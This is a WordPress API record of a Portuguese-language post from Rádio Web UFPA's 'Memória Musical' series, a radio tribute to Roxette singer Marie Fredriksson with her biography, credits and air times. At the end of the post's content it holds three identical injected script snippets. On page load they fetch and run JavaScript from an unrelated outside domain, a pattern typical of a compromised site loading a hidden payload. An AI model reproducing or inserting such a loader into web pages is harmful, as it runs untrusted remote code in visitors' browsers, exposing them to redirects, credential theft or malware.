{"id":8632,"date":"2021-07-23T08:00:00","date_gmt":"2021-07-23T11:00:00","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=8632"},"modified":"2025-10-21T11:30:19","modified_gmt":"2025-10-21T14:30:19","slug":"roxette","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/","title":{"rendered":"Roxette"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/MEMORIA%20MUSICAL%20-%20ROXETTE%2023.07.2021.mp3'>Mem\u00f3ria Musical - Roxette<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/MEMORIA MUSICAL - ROXETTE 23.07.2021.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"Mem\\u00f3ria Musical - Roxette\",\"caption\":\"\",\"description\":\"\\\"MEMORIA MUSICAL - ROXETTE 23.07.2021\\\". Genre: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"Mem\\u00f3ria Musical\",\"genre\":\"Other\",\"length_formatted\":\"54:23\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n\n\n<p>Nesta edi\u00e7\u00e3o do Mem\u00f3ria Musical, confira uma homenagem \u00e0 Marie Fredriksson, vocalista do <strong>Roxette<\/strong>, uma das bandas mais populares dos anos 1980 e 1990.<\/p>\n\n\n\n<p>Gun-Marie Fredriksson nasceu em 30 de maio de 1958 na cidade de \u00d6ssj\u00f6, interior da Su\u00e9cia. Ela come\u00e7ou a cantar e a tocar instrumentos ainda na inf\u00e2ncia e logo se tornou uma atra\u00e7\u00e3o nas festas de fam\u00edlia. Aos 17 anos, se matriculou em uma escola de m\u00fasica, mas descobriu a paix\u00e3o pelos palcos e abandonou a vida acad\u00eamica.<\/p>\n\n\n\n<p>O in\u00edcio da carreira foi em 1977 quando formou uma banda com um namorado da \u00e9poca. Depois, integrou uma nova banda e investiu na carreira solo at\u00e9 conhecer Per Gessle, com quem formaria a dupla <strong>Roxette<\/strong>.<\/p>\n\n\n\n<p>O primeiro \u00e1lbum da banda saiu em 1986, mas foi s\u00f3 em 1988 com o lan\u00e7amento do disco \u201cLook Sharp\u201d que o <strong>Roxette <\/strong>alcan\u00e7ou a fama internacional com o hit \u201cThe Look\u201d que chegou ao topo da parada dos Estados Unidos. Dois anos depois, o sucesso da banda foi impulsionado com a can\u00e7\u00e3o \u201cIt Must Have Been Love\u201d, inclu\u00edda na trilha sonora do filme <em>Uma Linda Mulher<\/em>.<\/p>\n\n\n\n<p>Nos anos 2000, o Roxette lan\u00e7ou novos discos e fez turn\u00eas em todo o mundo, mas o ritmo de trabalho foi interrompido por alguns anos devido aos problemas de sa\u00fade de Marie, que lutava contra um c\u00e2ncer de c\u00e9rebro. A doen\u00e7a e outros males causados por ela levaram a \u00f3bito a artista em 9 de dezembro de 2019.<\/p>\n\n\n\n<p>No entanto, a mem\u00f3ria das baladas que emocionam e nos fazem dan\u00e7ar ainda est\u00e3o celebradas no mundo da m\u00fasica. Ao longo deste programa, conhe\u00e7a mais sobre a trajet\u00f3ria de Marie Fredriksson e do <strong>Roxette<\/strong>, al\u00e9m de relembrar outros sucessos, como: \u201cSpending My Time\u201d, \u201cJoyride\u201d e \u201cListen To Your Heart\u201d.<\/p>\n\n\n\n<p>Apresenta\u00e7\u00e3o e dire\u00e7\u00e3o: \u00c1urea Garcia e Helando Fragoso<br>Produ\u00e7\u00e3o e roteiro: Victor Lorran<br>Grava\u00e7\u00e3o e montagem: Felipe Rocha<br>Dire\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<\/p>\n\n\n\n<p>O Mem\u00f3ria Musical especial Roxette vai ao ar na sexta-feira, \u00e0s 21h.<br>Hor\u00e1rios alternativos: S\u00e1bado, \u00e0s 21h, e quarta-feira, \u00e0s 21h.<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Roxette\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\" aria-label=\"Read more about Roxette\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":8641,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[4],"tags":[],"class_list":["post-8632","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-memoria-musical"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Roxette - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Confira uma homenagem \u00e0 Marie Fredriksson, e ao Roxette, e relembre sucessos da banda como &quot;It Must Have Been Love&quot; e &quot;Spending My Time&quot;.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Roxette - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Confira uma homenagem \u00e0 Marie Fredriksson, e ao Roxette, e relembre sucessos da banda como &quot;It Must Have Been Love&quot; e &quot;Spending My Time&quot;.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-23T11:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:30:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1548\" \/>\n\t<meta property=\"og:image:height\" content=\"1024\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Roxette\",\"datePublished\":\"2021-07-23T11:00:00+00:00\",\"dateModified\":\"2025-10-21T14:30:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\"},\"wordCount\":362,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1\",\"articleSection\":[\"Mem\u00f3ria Musical\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\",\"name\":\"Roxette - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1\",\"datePublished\":\"2021-07-23T11:00:00+00:00\",\"dateModified\":\"2025-10-21T14:30:19+00:00\",\"description\":\"Confira uma homenagem \u00e0 Marie Fredriksson, e ao Roxette, e relembre sucessos da banda como \\\"It Must Have Been Love\\\" e \\\"Spending My Time\\\".\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1\",\"width\":1548,\"height\":1024},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Roxette\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Roxette - Radio Web UFPA","description":"Confira uma homenagem \u00e0 Marie Fredriksson, e ao Roxette, e relembre sucessos da banda como \"It Must Have Been Love\" e \"Spending My Time\".","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/","og_locale":"pt_BR","og_type":"article","og_title":"Roxette - Radio Web UFPA","og_description":"Confira uma homenagem \u00e0 Marie Fredriksson, e ao Roxette, e relembre sucessos da banda como \"It Must Have Been Love\" e \"Spending My Time\".","og_url":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2021-07-23T11:00:00+00:00","article_modified_time":"2025-10-21T14:30:19+00:00","og_image":[{"width":1548,"height":1024,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Roxette","datePublished":"2021-07-23T11:00:00+00:00","dateModified":"2025-10-21T14:30:19+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/"},"wordCount":362,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1","articleSection":["Mem\u00f3ria Musical"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/","url":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/","name":"Roxette - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1","datePublished":"2021-07-23T11:00:00+00:00","dateModified":"2025-10-21T14:30:19+00:00","description":"Confira uma homenagem \u00e0 Marie Fredriksson, e ao Roxette, e relembre sucessos da banda como \"It Must Have Been Love\" e \"Spending My Time\".","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1","width":1548,"height":1024},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/memoria-musical\/roxette\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Roxette"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/07\/Memoria-Musical-Roxette.jpg?fit=1548%2C1024&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/s8TJeA-roxette","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8632","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=8632"}],"version-history":[{"count":10,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8632\/revisions"}],"predecessor-version":[{"id":17556,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8632\/revisions\/17556"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/8641"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=8632"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=8632"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=8632"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}